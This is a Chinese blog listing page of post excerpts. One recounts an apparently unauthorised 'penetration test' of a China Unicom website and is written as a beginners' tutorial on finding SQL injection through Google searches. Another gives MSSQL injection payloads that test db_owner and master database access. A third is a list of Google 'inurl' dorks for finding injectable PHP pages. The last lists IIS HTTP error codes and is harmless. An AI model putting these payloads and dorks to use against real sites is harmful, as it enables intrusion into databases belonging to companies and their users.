摘要:
对中国联通的一次渗透对中国联通网站的一次安全渗透测试。下面我将渗透测试的过程详细的写出来,以供新手朋友学习。水平还停留在完全依赖黑客工具入侵的朋友可要努力了。渗透之前的信息刺探的少不了的,但是我这里就不用大型黑客扫描软件,因为大型扫描软件发送大量的数据包,容易阻塞网络,有时候要视情况而定。那我们直接从WEB系统下手。打开联通的站点,站点做点做的很漂亮。一看程序是JSP的,意料之内,因为很多大型站点都爱用JSP构架的。打开谷歌搜索引擎,收集该站的动态页面。然后逐个测试每个动态连接看是否存在注入漏洞。经过我的仔细检测终于有所发现。这个地址链接是城市专栏的地址,提交一个单引号立即报错了。然后用经典的 阅读全文
摘要:
//看看是什么权限的and 1=(Select IS_MEMBER('db_owner'))And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS('master'))And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --数字类型and char(124)% 阅读全文
摘要:
inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:declaration_more.php?decl_id=inurl:pageid=inurl:games.php?id=inurl:page.php?file=inurl:newsDetail.php?id=inurl:gallery.php?id=inurl:article.php?id=inurl:show.php?id=inurl:staff_id=inurl:newsitem.php?num=inu 阅读全文
摘要:
400无法解析此请求。401.1未经授权:访问由于凭据无效被拒绝。401.2未经授权:访问由于服务器配置倾向使用替代身份验证方法而被拒绝。401.3未经授权:访问由于ACL对所请求资源的设置被拒绝。401.4未经授权:Web服务器上安装的筛选器授权失败。401.5未经授权:ISAPI/CGI应用程序授权失败。401.7未经授权:由于Web服务器上的URL授权策略而拒绝访问。403禁止访问:访问被拒绝。403.1禁止访问:执行访问被拒绝。403.2禁止访问:读取访问被拒绝。403.3禁止访问:写入访问被拒绝。403.4禁止访问:需要使用SSL查看该资源。403.5禁止访问:需要使用SSL128查 阅读全文